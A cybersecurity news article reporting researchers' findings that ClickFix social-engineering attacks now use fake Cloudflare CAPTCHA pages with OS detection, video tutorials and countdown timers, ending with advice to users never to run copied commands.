ClickFix malware attacks evolve with multi-OS support, video tutorials

ClickFix malware attacks evolve with multi-OS support, video tutorials By Bill Toulas November 6, 2025 09:00 AM 0 ClickFix attacks have evolved to feature videos that guide victims through the self-infection process, a timer to pressure targets into taking risky actions, and automatic  detection of the operating system to provide the correct commands. In a typical ClickFix attack, the threat actor relies on social-engineering to trick users into pasting and executing code or commands from a malicious page. The lures used may vary from identity verification to software problem solutions. The goal is to make the target execute malware that fetches and launches a payload, usually an information stealer. Most of the times, these attacks provided text instructions on a web page but newer versions rely on an embedded video to make the attack less suspicious. Push Security researchers have spotted this change in recent ClickFix campaigns, where a fake Cloudflare CAPTCHA verification challenge detected the victim’s OS and loaded a video tutorial on how to paste and run the malicious commands. Through a JavaScript, the threat actor can hide the commands and copy them automatically into the user's clipboard, thus reducing the chances of human error. On the same window, the challenge included a one-minute countdown timer that presses the victim into taking quick action and leaving little time to verify the authenticity or safety of the verification process. Adding to the deception is a “users verified in the last hour” counter, making the window appear as part of a legitimate Cloudflare bot check tool. Advanced ClickFix Cloudflare CAPTCHA with video and timerSource: Push Security Although we have seen ClickFix attacks against all major operating systems before, including macOS and Linux, the automatic detection and adjustment of the instructions is a new development. Push Security reports that these more advanced ClickFix webpages are promoted primarily through malvertizing on Google Search. The threat actors either exploit known flaws on outdated WordPress plugins to compromise legitimate sites and inject their malicious JavaScript on pages, or “vibe-code” sites and use SEO poisoning tactics to rank them higher up in the search results. Regarding the payloads delivered in these attacks, Push researchers noticed that they depended on the operating system, but included the MSHTA executable in Windows, PowerShell scripts, and various other living-off-the-land binaries. The researchers speculate that future ClickFix attacks could run entirely in the browser, evading EDR protections. As ClickFix evolves and takes more convincing and deceptive forms, users should remember that executing code on the terminal can never be a part of any online-based verification process, and no copied commands should ever be executed unless the user fully understands what they do. .ia_ad { background-color: #f0f6ff; width: 95%; max-width: 800px; margin: 15px auto; border-radius: 8px; border: 1px solid #d6ddee; display: flex; align-items: stretch; padding: 0; overflow: hidden; } .ia_lef { flex: 1; max-width: 200px; height: auto; display: flex; align-items: stretch; } .ia_lef a { display: flex; width: 100%; height: 100%; } .ia_lef a img { width: 100%; height: 100%; border-radius: 8px 0 0 8px; margin: 0; display: block; } .ia_rig { flex: 2; padding: 10px; display: flex; flex-direction: column; justify-content: center; } .ia_rig h2 { font-size: 17px !important; font-weight: 700; color: #333; line-height: 1.4; font-family: Georgia, "Times New Roman", Times, serif; margin: 0 0 14px 0; } .ia_rig p { font-weight: bold; font-size: 14px; margin: 0 0 clamp(6px, 2vw, 14px) 0; } .ia_button { background-color: #FFF; border: 1px solid #3b59aa; color: black; text-align: center; text-decoration: none; border-radius: 8px; display: inline-block; font-size: 16px; font-weight: bold; cursor: pointer; padding: 10px 20px; width: fit-content; } .ia_button a { text-decoration: none; color: inherit; display: block; } @media (max-width: 600px) { .ia_ad { flex-direction: column; align-items: center; } .ia_lef { max-width: 100%; } .ia_lef a img { border-radius: 8px 8px 0 0; } .ia_rig { padding: 15px; width: 100%; } .ia_button { width: 100%; margin: 0px auto; } } The 2026 CISO Budget Benchmark It's budget season! Over 300 CISOs and security leaders have shared how they're planning, spending, and prioritizing for the year ahead. This report compiles their insights, allowing readers to benchmark strategies, identify emerging trends, and compare their priorities as they head into 2026. Learn how top leaders are turning investment into measurable impact. Download Now Related Articles: Google ads for fake Homebrew, LogMeIn sites push infostealersTikTok videos continue to push infostealers in ClickFix attacksFake Microsoft Teams installers push Oyster malware via malvertisingMicrosoft warns of new XCSSET macOS malware variant targeting Xcode devsNew FileFix attack uses steganography to drop StealC malware